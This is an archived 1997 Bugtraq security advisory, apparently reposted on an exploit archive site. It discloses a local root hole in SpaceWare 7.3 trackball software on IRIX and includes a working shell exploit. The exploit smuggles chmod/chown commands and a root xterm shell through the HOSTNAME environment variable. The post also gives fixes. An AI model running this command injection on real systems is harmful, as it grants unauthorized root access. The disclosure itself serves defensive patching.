root bug in spaceware
Description: | Root hole in SpaceWare trackball software |
Author: | "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES> |
Compromise: | root (local) |
Vulnerable Systems: | Presumably any system running spaceware 7.3 v1.0 (probably earlier). I don't know if it is IRIX specific. From the message it sounds like there are likely other holes in the program. |
Date: | 20 August 1997 |
Date: Wed, 20 Aug 1997 15:53:31 +0200
From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
To: BUGTRAQ@NETSPACE.ORG
Subject: SpaceWare 7.3 v1.0
Hello
I guess anyone who's reading this already have noticed (if
you are playing with a SpaceBall), anyway here it goes:
===========================================================================
#!/bin/sh
SWDIR=/usr/local/SpaceWare
cp /bin/sh /tmp/sh
echo 6 | HOSTNAME="/bin/chmod 4755 /tmp/sh" \
$SWDIR/spaceball > /dev/null 2>&1
echo 6 | HOSTNAME="/bin/chown root /tmp/sh" \
$SWDIR/spaceball > /dev/null 2>&1
/tmp/sh
===========================================================================
more information:
IRIX 6.2
spaceware 7.3 v1.0 (http://www.spacetec.com/)
ftp://ftp.spacetec.com/put/spaceball2003and3003/drivers/app.irix.7_3.tar
(Obviously, you can use HOSTNAME for any command you want
to run as root, like
echo 6 | HOSTNAME="`which xterm` -e `which sh`" /usr/local/SpaceWare/spaceball
)
Fix:
a) rm (since spaceball.sh does lots of nasty things, like
running spaceball demos as root, probably this is the best
solution)
b) set HOSTNAME=/usr/bsd/hostname in the "Utilities" section of
$SWDIR/spaceball.sh
--
J.A. Gutierrez
finger me for PGP
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
world.
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: